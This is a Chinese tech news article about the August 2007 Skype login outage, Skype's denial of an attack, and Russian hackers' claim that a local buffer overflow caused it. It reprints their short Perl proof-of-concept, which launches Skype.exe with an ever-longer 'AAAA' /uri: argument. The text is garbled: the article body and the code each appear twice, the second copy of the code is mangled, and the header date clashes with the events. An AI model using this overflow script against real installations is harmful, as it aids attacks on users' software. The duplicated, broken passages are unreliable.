Skype否认被黑 俄黑客宣称对此负责
时间:07-22
来源:IT专家网
点击:
自8月16日下午4时起,Skype用户突然发现无法正登录。Skype立即发出官方消息,否认是系统崩溃或黑客攻击,并告知用户恢复故障需要大约24小时的时间。翌日,Skype发布新版本V3.5.0.214 Beta,业内分指出这很有可能是为了解决遇到的登陆问题而临时发布的。
在发布新版的同时,登录问题已经超过官方给出的24小时。直至18日,Skype的登录系统才基本恢复正常。
不过就在19日,来自俄罗斯论坛的一些帖子认为,此次世界范围内Skype无法登录是源于俄罗斯黑客所为,他们宣称发现了一个本地缓冲区溢出漏洞,可以伪造信息骗过Skype的认证服务器,并放出了部分溢出代码,从代码上看的确有一些问题,但是Skype官方却否认了这种说法。
俄黑客公布的漏洞代码:
! / usr / bin / perl # Simle Code by Maranax Porex; D # Skaypeg Ya! ! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str=""C:\Program Files\Skype\Phone\Skype.exe" "/uri:$eot""; system("$str"); } for ($ i = 256; $ i> xCCCCC; $ i = $ 256 i) ($ eot = 'AAAA' x $ i; call_sp ();) exit; sub call_sp () ($ str = "" C : Program Files Skype Phone Skype.exe "" / uri : $ eot ""; system ($ str);)
联想到之前Skype在系统故障时还有闲情推出新版本,不由得不让人觉得新版本的Skype正是解决某些系统漏洞而推出的。
在发布新版的同时,登录问题已经超过官方给出的24小时。直至18日,Skype的登录系统才基本恢复正常。
不过就在19日,来自俄罗斯论坛的一些帖子认为,此次世界范围内Skype无法登录是源于俄罗斯黑客所为,他们宣称发现了一个本地缓冲区溢出漏洞,可以伪造信息骗过Skype的认证服务器,并放出了部分溢出代码,从代码上看的确有一些问题,但是Skype官方却否认了这种说法。
俄黑客公布的漏洞代码:
! / usr / bin / perl # Simle Code by Maranax Porex; D # Skaypeg Ya! ! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str=""C:\Program Files\Skype\Phone\Skype.exe" "/uri:$eot""; system("$str"); } for ($ i = 256; $ i> xCCCCC; $ i = $ 256 i) ($ eot = 'AAAA' x $ i; call_sp ();) exit; sub call_sp () ($ str = "" C : Program Files Skype Phone Skype.exe "" / uri : $ eot ""; system ($ str);)
联想到之前Skype在系统故障时还有闲情推出新版本,不由得不让人觉得新版本的Skype正是解决某些系统漏洞而推出的。
- Skype正式宣布推出Skype 4.0 Windows版本(01-05)
- 用于Intel移动互联网设备的首版Skype现在推出(01-09)
- iPhone版Skype将登场 或仅能用Wi-Fi网络(03-02)
- Skype新型商用功能大揭秘,简单安装首当其冲!(01-16)
- “Skype蠕虫”病毒技术细节(08-14)
- 揭露伪装skype的网络钓鱼骗局(09-12)